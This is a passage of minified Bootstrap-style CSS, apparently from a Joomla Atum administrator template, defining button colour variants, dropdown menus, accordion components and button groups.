rgba(100,106,112,.5)}.btn-check:active+.btn-secondary,.btn-check:checked+.btn-secondary,.btn-secondary.active,.btn-secondary:active,.show>.btn-secondary.dropdown-toggle{color:#fff;background-color:#3a4046;border-color:#373c41}.btn-check:active+.btn-secondary:focus,.btn-check:checked+.btn-secondary:focus,.btn-secondary.active:focus,.btn-secondary:active:focus,.show>.btn-secondary.dropdown-toggle:focus{box-shadow:0 0 0 .25rem rgba(100,106,112,.5)}.btn-secondary.disabled,.btn-secondary:disabled{color:#fff;background-color:#495057;border-color:#495057}.btn-success{color:#fff;background-color:#457d54;border-color:#457d54}.btn-check:focus+.btn-success,.btn-success:focus,.btn-success:hover{color:#fff;background-color:#3b6a47;border-color:#376443}.btn-check:focus+.btn-success,.btn-success:focus{box-shadow:0 0 0 .25rem rgba(97,145,110,.5)}.btn-check:active+.btn-success,.btn-check:checked+.btn-success,.btn-success.active,.btn-success:active,.show>.btn-success.dropdown-toggle{color:#fff;background-color:#376443;border-color:#345e3f}.btn-check:active+.btn-success:focus,.btn-check:checked+.btn-success:focus,.btn-success.active:focus,.btn-success:active:focus,.show>.btn-success.dropdown-toggle:focus{box-shadow:0 0 0 .25rem rgba(97,145,110,.5)}.btn-success.disabled,.btn-success:disabled{color:#fff;background-color:#457d54;border-color:#457d54}.btn-info{color:#fff;background-color:#2a69b8;border-color:#2a69b8}.btn-check:focus+.btn-info,.btn-info:focus,.btn-info:hover{color:#fff;background-color:#24599c;border-color:#225493}.btn-check:focus+.btn-info,.btn-info:focus{box-shadow:0 0 0 .25rem rgba(74,128,195,.5)}.btn-check:active+.btn-info,.btn-check:checked+.btn-info,.btn-info.active,.btn-info:active,.show>.btn-info.dropdown-toggle{color:#fff;background-color:#225493;border-color:#204f8a}.btn-check:active+.btn-info:focus,.btn-check:checked+.btn-info:focus,.btn-info.active:focus,.btn-info:active:focus,.show>.btn-info.dropdown-toggle:focus{box-shadow:0 0 0 .25rem rgba(74,128,195,.5)}.btn-info.disabled,.btn-info:disabled{color:#fff;background-color:#2a69b8;border-color:#2a69b8}.btn-warning{color:#000;background-color:#ffb514;border-color:#ffb514}.btn-check:focus+.btn-warning,.btn-warning:focus,.btn-warning:hover{color:#000;background-color:#ffc037;border-color:#ffbc2c}.btn-check:focus+.btn-warning,.btn-warning:focus{box-shadow:0 0 0 .25rem rgba(217,154,17,.5)}.btn-check:active+.btn-warning,.btn-check:checked+.btn-warning,.btn-warning.active,.btn-warning:active,.show>.btn-warning.dropdown-toggle{color:#000;background-color:#ffc443;border-color:#ffbc2c}.btn-check:active+.btn-warning:focus,.btn-check:checked+.btn-warning:focus,.btn-warning.active:focus,.btn-warning:active:focus,.show>.btn-warning.dropdown-toggle:focus{box-shadow:0 0 0 .25rem rgba(217,154,17,.5)}.btn-warning.disabled,.btn-warning:disabled{color:#000;background-color:#ffb514;border-color:#ffb514}.btn-danger{color:#fff;background-color:#c52827;border-color:#c52827}.btn-check:focus+.btn-danger,.btn-danger:focus,.btn-danger:hover{color:#fff;background-color:#a72221;border-color:#9e201f}.btn-check:focus+.btn-danger,.btn-danger:focus{box-shadow:0 0 0 .25rem rgba(206,72,71,.5)}.btn-check:active+.btn-danger,.btn-check:checked+.btn-danger,.btn-danger.active,.btn-danger:active,.show>.btn-danger.dropdown-toggle{color:#fff;background-color:#9e201f;border-color:#941e1d}.btn-check:active+.btn-danger:focus,.btn-check:checked+.btn-danger:focus,.btn-danger.active:focus,.btn-danger:active:focus,.show>.btn-danger.dropdown-toggle:focus{box-shadow:0 0 0 .25rem rgba(206,72,71,.5)}.btn-danger.disabled,.btn-danger:disabled{color:#fff;background-color:#c52827;border-color:#c52827}.btn-light{color:#000;background-color:#f8f9fa;border-color:#f8f9fa}.btn-check:focus+.btn-light,.btn-light:focus,.btn-light:hover{color:#000;background-color:#f9fafb;border-color:#f9fafb}.btn-check:focus+.btn-light,.btn-light:focus{box-shadow:0 0 0 .25rem rgba(211,212,213,.5)}.btn-check:active+.btn-light,.btn-check:checked+.btn-light,.btn-light.active,.btn-light:active,.show>.btn-light.dropdown-toggle{color:#000;background-color:#f9fafb;border-color:#f9fafb}.btn-check:active+.btn-light:focus,.btn-check:checked+.btn-light:focus,.btn-light.active:focus,.btn-light:active:focus,.show>.btn-light.dropdown-toggle:focus{box-shadow:0 0 0 .25rem rgba(211,212,213,.5)}.btn-light.disabled,.btn-light:disabled{color:#000;background-color:#f8f9fa;border-color:#f8f9fa}.btn-dark{color:#fff;background-color:#212529;border-color:#212529}.btn-check:focus+.btn-dark,.btn-dark:focus,.btn-dark:hover{color:#fff;background-color:#1c1f23;border-color:#1a1e21}.btn-check:focus+.btn-dark,.btn-dark:focus{box-shadow:0 0 0 .25rem rgba(66,70,73,.5)}.btn-check:active+.btn-dark,.btn-check:checked+.btn-dark,.btn-dark.active,.btn-dark:active,.show>.btn-dark.dropdown-toggle{color:#fff;background-color:#1a1e21;border-color:#191c1f}.btn-check:active+.btn-dark:focus,.btn-check:checked+.btn-dark:focus,.btn-dark.active:focus,.btn-dark:active:focus,.show>.btn-dark.dropdown-toggle:focus{box-shadow:0 0 0 .25rem rgba(66,70,73,.5)}.btn-dark.disabled,.btn-dark:disabled{color:#fff;background-color:#212529;border-color:#212529}.btn-atum-link-color{color:#fff;background-color:#2a69b8;border-color:#2a69b8}.btn-atum-link-color:hover{color:#fff;background-color:#24599c;border-color:#225493}.btn-atum-link-color:focus,.btn-check:focus+.btn-atum-link-color{color:#fff;background-color:#24599c;border-color:#225493;box-shadow:0 0 0 .25rem rgba(74,128,195,.5)}.btn-atum-link-color.active,.btn-atum-link-color:active,.btn-check:active+.btn-atum-link-color,.btn-check:checked+.btn-atum-link-color,.show>.btn-atum-link-color.dropdown-toggle{color:#fff;background-color:#225493;border-color:#204f8a}.btn-atum-link-color.active:focus,.btn-atum-link-color:active:focus,.btn-check:active+.btn-atum-link-color:focus,.btn-check:checked+.btn-atum-link-color:focus,.show>.btn-atum-link-color.dropdown-toggle:focus{box-shadow:0 0 0 .25rem rgba(74,128,195,.5)}.btn-atum-link-color.disabled,.btn-atum-link-color:disabled{color:#fff;background-color:#2a69b8;border-color:#2a69b8}.btn-atum-text-dark{color:#fff;background-color:#495057;border-color:#495057}.btn-atum-text-dark:hover{color:#fff;background-color:#3e444a;border-color:#3a4046}.btn-atum-text-dark:focus,.btn-check:focus+.btn-atum-text-dark{color:#fff;background-color:#3e444a;border-color:#3a4046;box-shadow:0 0 0 .25rem rgba(100,106,112,.5)}.btn-atum-text-dark.active,.btn-atum-text-dark:active,.btn-check:active+.btn-atum-text-dark,.btn-check:checked+.btn-atum-text-dark,.show>.btn-atum-text-dark.dropdown-toggle{color:#fff;background-color:#3a4046;border-color:#373c41}.btn-atum-text-dark.active:focus,.btn-atum-text-dark:active:focus,.btn-check:active+.btn-atum-text-dark:focus,.btn-check:checked+.btn-atum-text-dark:focus,.show>.btn-atum-text-dark.dropdown-toggle:focus{box-shadow:0 0 0 .25rem rgba(100,106,112,.5)}.btn-atum-text-dark.disabled,.btn-atum-text-dark:disabled{color:#fff;background-color:#495057;border-color:#495057}.btn-action{color:#fff;background-color:#132f53;border-color:#132f53}.btn-action:focus,.btn-action:hover,.btn-check:focus+.btn-action{color:#fff;background-color:#102847;border-color:#0f2642}.btn-action:focus,.btn-check:focus+.btn-action{box-shadow:0 0 0 .25rem rgba(54,78,109,.5)}.btn-action.active,.btn-action:active,.btn-check:active+.btn-action,.btn-check:checked+.btn-action,.show>.btn-action.dropdown-toggle{color:#fff;background-color:#0f2642;border-color:#0e233e}.btn-action.active:focus,.btn-action:active:focus,.btn-check:active+.btn-action:focus,.btn-check:checked+.btn-action:focus,.show>.btn-action.dropdown-toggle:focus{box-shadow:0 0 0 .25rem rgba(54,78,109,.5)}.btn-action.disabled,.btn-action:disabled{color:#fff;background-color:#132f53;border-color:#132f53}.btn-error{color:#fff;background-color:#3b0d0c;border-color:#3b0d0c}.btn-check:focus+.btn-error,.btn-error:focus,.btn-error:hover{color:#fff;background-color:#320b0a;border-color:#2f0a0a}.btn-check:focus+.btn-error,.btn-error:focus{box-shadow:0 0 0 .25rem rgba(88,49,48,.5)}.btn-check:active+.btn-error,.btn-check:checked+.btn-error,.btn-error.active,.btn-error:active,.show>.btn-error.dropdown-toggle{color:#fff;background-color:#2f0a0a;border-color:#2c0a09}.btn-check:active+.btn-error:focus,.btn-check:checked+.btn-error:focus,.btn-error.active:focus,.btn-error:active:focus,.show>.btn-error.dropdown-toggle:focus{box-shadow:0 0 0 .25rem rgba(88,49,48,.5)}.btn-error.disabled,.btn-error:disabled{color:#fff;background-color:#3b0d0c;border-color:#3b0d0c}.btn-alert-success{color:#fff;background-color:#0f2f21;border-color:#0f2f21}.btn-alert-success:hover{color:#fff;background-color:#0d281c;border-color:#0c261a}.btn-alert-success:focus,.btn-check:focus+.btn-alert-success{color:#fff;background-color:#0d281c;border-color:#0c261a;box-shadow:0 0 0 .25rem rgba(51,78,66,.5)}.btn-alert-success.active,.btn-alert-success:active,.btn-check:active+.btn-alert-success,.btn-check:checked+.btn-alert-success,.show>.btn-alert-success.dropdown-toggle{color:#fff;background-color:#0c261a;border-color:#0b2319}.btn-alert-success.active:focus,.btn-alert-success:active:focus,.btn-check:active+.btn-alert-success:focus,.btn-check:checked+.btn-alert-success:focus,.show>.btn-alert-success.dropdown-toggle:focus{box-shadow:0 0 0 .25rem rgba(51,78,66,.5)}.btn-alert-success.disabled,.btn-alert-success:disabled{color:#fff;background-color:#0f2f21;border-color:#0f2f21}.btn-outline-primary{color:#132f53;border-color:#132f53}.btn-outline-primary:hover{color:#fff;background-color:#132f53;border-color:#132f53}.btn-check:focus+.btn-outline-primary,.btn-outline-primary:focus{box-shadow:0 0 0 .25rem rgba(19,47,83,.5)}.btn-check:active+.btn-outline-primary,.btn-check:checked+.btn-outline-primary,.btn-outline-primary.active,.btn-outline-primary.dropdown-toggle.show,.btn-outline-primary:active{color:#fff;background-color:#132f53;border-color:#132f53}.btn-check:active+.btn-outline-primary:focus,.btn-check:checked+.btn-outline-primary:focus,.btn-outline-primary.active:focus,.btn-outline-primary.dropdown-toggle.show:focus,.btn-outline-primary:active:focus{box-shadow:0 0 0 .25rem rgba(19,47,83,.5)}.btn-outline-primary.disabled,.btn-outline-primary:disabled{color:#132f53;background-color:transparent}.btn-outline-secondary{color:#495057;border-color:#495057}.btn-outline-secondary:hover{color:#fff;background-color:#495057;border-color:#495057}.btn-check:focus+.btn-outline-secondary,.btn-outline-secondary:focus{box-shadow:0 0 0 .25rem rgba(73,80,87,.5)}.btn-check:active+.btn-outline-secondary,.btn-check:checked+.btn-outline-secondary,.btn-outline-secondary.active,.btn-outline-secondary.dropdown-toggle.show,.btn-outline-secondary:active{color:#fff;background-color:#495057;border-color:#495057}.btn-check:active+.btn-outline-secondary:focus,.btn-check:checked+.btn-outline-secondary:focus,.btn-outline-secondary.active:focus,.btn-outline-secondary.dropdown-toggle.show:focus,.btn-outline-secondary:active:focus{box-shadow:0 0 0 .25rem rgba(73,80,87,.5)}.btn-outline-secondary.disabled,.btn-outline-secondary:disabled{color:#495057;background-color:transparent}.btn-outline-success{color:#457d54;border-color:#457d54}.btn-outline-success:hover{color:#fff;background-color:#457d54;border-color:#457d54}.btn-check:focus+.btn-outline-success,.btn-outline-success:focus{box-shadow:0 0 0 .25rem rgba(69,125,84,.5)}.btn-check:active+.btn-outline-success,.btn-check:checked+.btn-outline-success,.btn-outline-success.active,.btn-outline-success.dropdown-toggle.show,.btn-outline-success:active{color:#fff;background-color:#457d54;border-color:#457d54}.btn-check:active+.btn-outline-success:focus,.btn-check:checked+.btn-outline-success:focus,.btn-outline-success.active:focus,.btn-outline-success.dropdown-toggle.show:focus,.btn-outline-success:active:focus{box-shadow:0 0 0 .25rem rgba(69,125,84,.5)}.btn-outline-success.disabled,.btn-outline-success:disabled{color:#457d54;background-color:transparent}.btn-outline-info{color:#2a69b8;border-color:#2a69b8}.btn-outline-info:hover{color:#fff;background-color:#2a69b8;border-color:#2a69b8}.btn-check:focus+.btn-outline-info,.btn-outline-info:focus{box-shadow:0 0 0 .25rem rgba(42,105,184,.5)}.btn-check:active+.btn-outline-info,.btn-check:checked+.btn-outline-info,.btn-outline-info.active,.btn-outline-info.dropdown-toggle.show,.btn-outline-info:active{color:#fff;background-color:#2a69b8;border-color:#2a69b8}.btn-check:active+.btn-outline-info:focus,.btn-check:checked+.btn-outline-info:focus,.btn-outline-info.active:focus,.btn-outline-info.dropdown-toggle.show:focus,.btn-outline-info:active:focus{box-shadow:0 0 0 .25rem rgba(42,105,184,.5)}.btn-outline-info.disabled,.btn-outline-info:disabled{color:#2a69b8;background-color:transparent}.btn-outline-warning{color:#ffb514;border-color:#ffb514}.btn-outline-warning:hover{color:#000;background-color:#ffb514;border-color:#ffb514}.btn-check:focus+.btn-outline-warning,.btn-outline-warning:focus{box-shadow:0 0 0 .25rem rgba(255,181,20,.5)}.btn-check:active+.btn-outline-warning,.btn-check:checked+.btn-outline-warning,.btn-outline-warning.active,.btn-outline-warning.dropdown-toggle.show,.btn-outline-warning:active{color:#000;background-color:#ffb514;border-color:#ffb514}.btn-check:active+.btn-outline-warning:focus,.btn-check:checked+.btn-outline-warning:focus,.btn-outline-warning.active:focus,.btn-outline-warning.dropdown-toggle.show:focus,.btn-outline-warning:active:focus{box-shadow:0 0 0 .25rem rgba(255,181,20,.5)}.btn-outline-warning.disabled,.btn-outline-warning:disabled{color:#ffb514;background-color:transparent}.btn-outline-danger{color:#c52827;border-color:#c52827}.btn-outline-danger:hover{color:#fff;background-color:#c52827;border-color:#c52827}.btn-check:focus+.btn-outline-danger,.btn-outline-danger:focus{box-shadow:0 0 0 .25rem rgba(197,40,39,.5)}.btn-check:active+.btn-outline-danger,.btn-check:checked+.btn-outline-danger,.btn-outline-danger.active,.btn-outline-danger.dropdown-toggle.show,.btn-outline-danger:active{color:#fff;background-color:#c52827;border-color:#c52827}.btn-check:active+.btn-outline-danger:focus,.btn-check:checked+.btn-outline-danger:focus,.btn-outline-danger.active:focus,.btn-outline-danger.dropdown-toggle.show:focus,.btn-outline-danger:active:focus{box-shadow:0 0 0 .25rem rgba(197,40,39,.5)}.btn-outline-danger.disabled,.btn-outline-danger:disabled{color:#c52827;background-color:transparent}.btn-outline-light{color:#f8f9fa;border-color:#f8f9fa}.btn-outline-light:hover{color:#000;background-color:#f8f9fa;border-color:#f8f9fa}.btn-check:focus+.btn-outline-light,.btn-outline-light:focus{box-shadow:0 0 0 .25rem rgba(248,249,250,.5)}.btn-check:active+.btn-outline-light,.btn-check:checked+.btn-outline-light,.btn-outline-light.active,.btn-outline-light.dropdown-toggle.show,.btn-outline-light:active{color:#000;background-color:#f8f9fa;border-color:#f8f9fa}.btn-check:active+.btn-outline-light:focus,.btn-check:checked+.btn-outline-light:focus,.btn-outline-light.active:focus,.btn-outline-light.dropdown-toggle.show:focus,.btn-outline-light:active:focus{box-shadow:0 0 0 .25rem rgba(248,249,250,.5)}.btn-outline-light.disabled,.btn-outline-light:disabled{color:#f8f9fa;background-color:transparent}.btn-outline-dark{color:#212529;border-color:#212529}.btn-outline-dark:hover{color:#fff;background-color:#212529;border-color:#212529}.btn-check:focus+.btn-outline-dark,.btn-outline-dark:focus{box-shadow:0 0 0 .25rem rgba(33,37,41,.5)}.btn-check:active+.btn-outline-dark,.btn-check:checked+.btn-outline-dark,.btn-outline-dark.active,.btn-outline-dark.dropdown-toggle.show,.btn-outline-dark:active{color:#fff;background-color:#212529;border-color:#212529}.btn-check:active+.btn-outline-dark:focus,.btn-check:checked+.btn-outline-dark:focus,.btn-outline-dark.active:focus,.btn-outline-dark.dropdown-toggle.show:focus,.btn-outline-dark:active:focus{box-shadow:0 0 0 .25rem rgba(33,37,41,.5)}.btn-outline-dark.disabled,.btn-outline-dark:disabled{color:#212529;background-color:transparent}.btn-outline-atum-link-color{color:#2a69b8;border-color:#2a69b8}.btn-outline-atum-link-color:hover{color:#fff;background-color:#2a69b8;border-color:#2a69b8}.btn-check:focus+.btn-outline-atum-link-color,.btn-outline-atum-link-color:focus{box-shadow:0 0 0 .25rem rgba(42,105,184,.5)}.btn-check:active+.btn-outline-atum-link-color,.btn-check:checked+.btn-outline-atum-link-color,.btn-outline-atum-link-color.active,.btn-outline-atum-link-color.dropdown-toggle.show,.btn-outline-atum-link-color:active{color:#fff;background-color:#2a69b8;border-color:#2a69b8}.btn-check:active+.btn-outline-atum-link-color:focus,.btn-check:checked+.btn-outline-atum-link-color:focus,.btn-outline-atum-link-color.active:focus,.btn-outline-atum-link-color.dropdown-toggle.show:focus,.btn-outline-atum-link-color:active:focus{box-shadow:0 0 0 .25rem rgba(42,105,184,.5)}.btn-outline-atum-link-color.disabled,.btn-outline-atum-link-color:disabled{color:#2a69b8;background-color:transparent}.btn-outline-atum-text-dark{color:#495057;border-color:#495057}.btn-outline-atum-text-dark:hover{color:#fff;background-color:#495057;border-color:#495057}.btn-check:focus+.btn-outline-atum-text-dark,.btn-outline-atum-text-dark:focus{box-shadow:0 0 0 .25rem rgba(73,80,87,.5)}.btn-check:active+.btn-outline-atum-text-dark,.btn-check:checked+.btn-outline-atum-text-dark,.btn-outline-atum-text-dark.active,.btn-outline-atum-text-dark.dropdown-toggle.show,.btn-outline-atum-text-dark:active{color:#fff;background-color:#495057;border-color:#495057}.btn-check:active+.btn-outline-atum-text-dark:focus,.btn-check:checked+.btn-outline-atum-text-dark:focus,.btn-outline-atum-text-dark.active:focus,.btn-outline-atum-text-dark.dropdown-toggle.show:focus,.btn-outline-atum-text-dark:active:focus{box-shadow:0 0 0 .25rem rgba(73,80,87,.5)}.btn-outline-atum-text-dark.disabled,.btn-outline-atum-text-dark:disabled{color:#495057;background-color:transparent}.btn-outline-action{color:#132f53;border-color:#132f53}.btn-outline-action:hover{color:#fff;background-color:#132f53;border-color:#132f53}.btn-check:focus+.btn-outline-action,.btn-outline-action:focus{box-shadow:0 0 0 .25rem rgba(19,47,83,.5)}.btn-check:active+.btn-outline-action,.btn-check:checked+.btn-outline-action,.btn-outline-action.active,.btn-outline-action.dropdown-toggle.show,.btn-outline-action:active{color:#fff;background-color:#132f53;border-color:#132f53}.btn-check:active+.btn-outline-action:focus,.btn-check:checked+.btn-outline-action:focus,.btn-outline-action.active:focus,.btn-outline-action.dropdown-toggle.show:focus,.btn-outline-action:active:focus{box-shadow:0 0 0 .25rem rgba(19,47,83,.5)}.btn-outline-action.disabled,.btn-outline-action:disabled{color:#132f53;background-color:transparent}.btn-outline-error{color:#3b0d0c;border-color:#3b0d0c}.btn-outline-error:hover{color:#fff;background-color:#3b0d0c;border-color:#3b0d0c}.btn-check:focus+.btn-outline-error,.btn-outline-error:focus{box-shadow:0 0 0 .25rem rgba(59,13,12,.5)}.btn-check:active+.btn-outline-error,.btn-check:checked+.btn-outline-error,.btn-outline-error.active,.btn-outline-error.dropdown-toggle.show,.btn-outline-error:active{color:#fff;background-color:#3b0d0c;border-color:#3b0d0c}.btn-check:active+.btn-outline-error:focus,.btn-check:checked+.btn-outline-error:focus,.btn-outline-error.active:focus,.btn-outline-error.dropdown-toggle.show:focus,.btn-outline-error:active:focus{box-shadow:0 0 0 .25rem rgba(59,13,12,.5)}.btn-outline-error.disabled,.btn-outline-error:disabled{color:#3b0d0c;background-color:transparent}.btn-outline-alert-success{color:#0f2f21;border-color:#0f2f21}.btn-outline-alert-success:hover{color:#fff;background-color:#0f2f21;border-color:#0f2f21}.btn-check:focus+.btn-outline-alert-success,.btn-outline-alert-success:focus{box-shadow:0 0 0 .25rem rgba(15,47,33,.5)}.btn-check:active+.btn-outline-alert-success,.btn-check:checked+.btn-outline-alert-success,.btn-outline-alert-success.active,.btn-outline-alert-success.dropdown-toggle.show,.btn-outline-alert-success:active{color:#fff;background-color:#0f2f21;border-color:#0f2f21}.btn-check:active+.btn-outline-alert-success:focus,.btn-check:checked+.btn-outline-alert-success:focus,.btn-outline-alert-success.active:focus,.btn-outline-alert-success.dropdown-toggle.show:focus,.btn-outline-alert-success:active:focus{box-shadow:0 0 0 .25rem rgba(15,47,33,.5)}.btn-outline-alert-success.disabled,.btn-outline-alert-success:disabled{color:#0f2f21;background-color:transparent}.btn-link{font-weight:400;color:var(--template-link-color);text-decoration:none}.btn-link:hover{color:var(--template-link-hover-color)}.btn-link.disabled,.btn-link:disabled{color:#666e76}.btn-group-lg>.btn,.btn-lg{padding:.5rem 1rem;font-size:1.25rem;border-radius:.3rem}.btn-group-sm>.btn,.btn-sm{padding:.25rem .5rem;font-size:.8rem;border-radius:.2rem}.fade{transition:opacity .15s linear}@media (prefers-reduced-motion:reduce){.fade{transition:none}}.fade:not(.show){opacity:0}.collapse:not(.show){display:none}.collapsing{height:0;overflow:hidden;transition:height .35s ease}@media (prefers-reduced-motion:reduce){.collapsing{transition:none}}.dropdown,.dropend,.dropstart,.dropup{position:relative}.dropdown-toggle{white-space:nowrap}.dropdown-toggle:after{display:inline-block;margin-left:.255em;vertical-align:.255em;content:"";border-top:.3em solid;border-right:.3em solid transparent;border-bottom:0;border-left:.3em solid transparent}.dropdown-toggle:empty:after{margin-left:0}.dropdown-menu{position:absolute;z-index:1000;display:none;min-width:10rem;padding:0;margin:0;font-size:1rem;color:var(--template-text-dark);text-align:left;list-style:none;background-color:#fff;background-clip:padding-box;border:1px solid rgba(0,0,0,.15);border-radius:.25rem}.dropdown-menu[data-bs-popper]{top:100%;left:0;margin-top:0}.dropdown-menu-start{--bs-position:start}.dropdown-menu-start[data-bs-popper]{right:auto;left:0}.dropdown-menu-end{--bs-position:end}.dropdown-menu-end[data-bs-popper]{right:0;left:auto}@media (min-width:576px){.dropdown-menu-sm-start{--bs-position:start}.dropdown-menu-sm-start[data-bs-popper]{right:auto;left:0}.dropdown-menu-sm-end{--bs-position:end}.dropdown-menu-sm-end[data-bs-popper]{right:0;left:auto}}@media (min-width:768px){.dropdown-menu-md-start{--bs-position:start}.dropdown-menu-md-start[data-bs-popper]{right:auto;left:0}.dropdown-menu-md-end{--bs-position:end}.dropdown-menu-md-end[data-bs-popper]{right:0;left:auto}}@media (min-width:992px){.dropdown-menu-lg-start{--bs-position:start}.dropdown-menu-lg-start[data-bs-popper]{right:auto;left:0}.dropdown-menu-lg-end{--bs-position:end}.dropdown-menu-lg-end[data-bs-popper]{right:0;left:auto}}@media (min-width:1200px){.dropdown-menu-xl-start{--bs-position:start}.dropdown-menu-xl-start[data-bs-popper]{right:auto;left:0}.dropdown-menu-xl-end{--bs-position:end}.dropdown-menu-xl-end[data-bs-popper]{right:0;left:auto}}@media (min-width:1400px){.dropdown-menu-xxl-start{--bs-position:start}.dropdown-menu-xxl-start[data-bs-popper]{right:auto;left:0}.dropdown-menu-xxl-end{--bs-position:end}.dropdown-menu-xxl-end[data-bs-popper]{right:0;left:auto}}.dropup .dropdown-menu[data-bs-popper]{top:auto;bottom:100%;margin-top:0;margin-bottom:0}.dropup .dropdown-toggle:after{display:inline-block;margin-left:.255em;vertical-align:.255em;content:"";border-top:0;border-right:.3em solid transparent;border-bottom:.3em solid;border-left:.3em solid transparent}.dropup .dropdown-toggle:empty:after{margin-left:0}.dropend .dropdown-menu[data-bs-popper]{top:0;right:auto;left:100%;margin-top:0;margin-left:0}.dropend .dropdown-toggle:after{display:inline-block;margin-left:.255em;vertical-align:.255em;content:"";border-top:.3em solid transparent;border-right:0;border-bottom:.3em solid transparent;border-left:.3em solid}.dropend .dropdown-toggle:empty:after{margin-left:0}.dropend .dropdown-toggle:after{vertical-align:0}.dropstart .dropdown-menu[data-bs-popper]{top:0;right:100%;left:auto;margin-top:0;margin-right:0}.dropstart .dropdown-toggle:after{display:inline-block;margin-left:.255em;vertical-align:.255em;content:"";display:none}.dropstart .dropdown-toggle:before{display:inline-block;margin-right:.255em;vertical-align:.255em;content:"";border-top:.3em solid transparent;border-right:.3em solid;border-bottom:.3em solid transparent}.dropstart .dropdown-toggle:empty:after{margin-left:0}.dropstart .dropdown-toggle:before{vertical-align:0}.dropdown-divider{height:0;margin:.5rem 0;overflow:hidden;border-top:1px solid rgba(0,0,0,.15)}.dropdown-item{display:block;width:100%;padding:.5rem .75rem;clear:both;font-weight:400;color:#212529;text-align:inherit;white-space:nowrap;background-color:transparent;border:0}.dropdown-item:first-child{border-top-left-radius:calc(.25rem - 1px);border-top-right-radius:calc(.25rem - 1px)}.dropdown-item:last-child{border-bottom-right-radius:calc(.25rem - 1px);border-bottom-left-radius:calc(.25rem - 1px)}.dropdown-item:focus,.dropdown-item:hover{color:var(--template-text-dark);background-color:#e8e8e8}.dropdown-item.active,.dropdown-item:active{color:#fff;text-decoration:none;background-color:#2a69b7}.dropdown-item.disabled,.dropdown-item:disabled{color:#adb5bd;pointer-events:none;background-color:transparent}.dropdown-menu.show{display:block}.dropdown-header{display:block;padding:0 .75rem;margin-bottom:0;font-size:.8rem;color:#666e76;white-space:nowrap}.dropdown-item-text{display:block;padding:.5rem .75rem;color:#212529}.dropdown-menu-dark{color:#dee2e6;background-color:#343a40;border-color:rgba(0,0,0,.15)}.dropdown-menu-dark .dropdown-item{color:#dee2e6}.dropdown-menu-dark .dropdown-item:focus,.dropdown-menu-dark .dropdown-item:hover{color:#fff;background-color:hsla(0,0%,100%,.15)}.dropdown-menu-dark .dropdown-item.active,.dropdown-menu-dark .dropdown-item:active{color:#fff;background-color:#2a69b7}.dropdown-menu-dark .dropdown-item.disabled,.dropdown-menu-dark .dropdown-item:disabled{color:#adb5bd}.dropdown-menu-dark .dropdown-divider{border-color:rgba(0,0,0,.15)}.dropdown-menu-dark .dropdown-item-text{color:#dee2e6}.dropdown-menu-dark .dropdown-header{color:#adb5bd}.accordion-button{position:relative;display:flex;align-items:center;width:100%;padding:1rem 1.25rem;font-size:1rem;color:var(--template-text-dark);text-align:left;background-color:#fff;border:0;border-radius:0;overflow-anchor:none;transition:color .15s ease-in-out,background-color .15s ease-in-out,border-color .15s ease-in-out,box-shadow .15s ease-in-out,border-radius .15s ease}@media (prefers-reduced-motion:reduce){.accordion-button{transition:none}}.accordion-button:not(.collapsed){color:#265fa5;background-color:#eaf0f8;box-shadow:inset 0 -1px 0 rgba(0,0,0,.125)}.accordion-button:not(.collapsed):after{background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 16 16' fill='%23265fa5'%3E%3Cpath fill-rule='evenodd' d='M1.646 4.646a.5.5 0 01.708 0L8 10.293l5.646-5.647a.5.5 0 01.708.708l-6 6a.5.5 0 01-.708 0l-6-6a.5.5 0 010-.708z'/%3E%3C/svg%3E");-webkit-transform:rotate(-180deg);transform:rotate(-180deg)}.accordion-button:after{flex-shrink:0;width:1.25rem;height:1.25rem;margin-left:auto;content:"";background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 16 16' fill='var(--template-text-dark)'%3E%3Cpath fill-rule='evenodd' d='M1.646 4.646a.5.5 0 01.708 0L8 10.293l5.646-5.647a.5.5 0 01.708.708l-6 6a.5.5 0 01-.708 0l-6-6a.5.5 0 010-.708z'/%3E%3C/svg%3E");background-repeat:no-repeat;background-size:1.25rem;transition:-webkit-transform .2s ease-in-out;transition:transform .2s ease-in-out;transition:transform .2s ease-in-out,-webkit-transform .2s ease-in-out}@media (prefers-reduced-motion:reduce){.accordion-button:after{transition:none}}.accordion-button:hover{z-index:2}.accordion-button:focus{z-index:3;border-color:#95b4db;outline:0;box-shadow:0 0 0 .25rem rgba(42,105,183,.25)}.accordion-header{margin-bottom:0}.accordion-item{background-color:#fff;border:1px solid rgba(0,0,0,.125)}.accordion-item:first-of-type{border-top-left-radius:.25rem;border-top-right-radius:.25rem}.accordion-item:first-of-type .accordion-button{border-top-left-radius:calc(.25rem - 1px);border-top-right-radius:calc(.25rem - 1px)}.accordion-item:not(:first-of-type){border-top:0}.accordion-item:last-of-type{border-bottom-right-radius:.25rem;border-bottom-left-radius:.25rem}.accordion-item:last-of-type .accordion-button.collapsed{border-bottom-right-radius:calc(.25rem - 1px);border-bottom-left-radius:calc(.25rem - 1px)}.accordion-item:last-of-type .accordion-collapse{border-bottom-right-radius:.25rem;border-bottom-left-radius:.25rem}.accordion-body{padding:1rem 1.25rem}.accordion-flush .accordion-collapse{border-width:0}.accordion-flush .accordion-item{border-right:0;border-left:0;border-radius:0}.accordion-flush .accordion-item:first-child{border-top:0}.accordion-flush .accordion-item:last-child{border-bottom:0}.accordion-flush .accordion-item .accordion-button{border-radius:0}.btn-group,.btn-group-vertical{position:relative;display:inline-flex;vertical-align:middle}.btn-group-vertical>.btn,.btn-group>.btn{position:relative;flex:1 1 auto}.btn-group-vertical>.btn-check:checked+.btn,.btn-group-vertical>.btn-check:focus+.btn,.btn-group-vertical>.btn.active,.btn-group-vertical>.btn:active,.btn-group-vertical>.btn:focus,.btn-group-vertical>.btn:hover,.btn-group>.btn-check:checked+.btn,.btn-group>.btn-check:focus+.btn,.btn-group>.btn.active,.btn-group>.btn:active,.btn-group>.btn:focus,.btn-group>.btn:hover{z-index:1}.btn-toolbar{display:flex;flex-wrap:wrap;justify-content:flex-start}.btn-toolbar 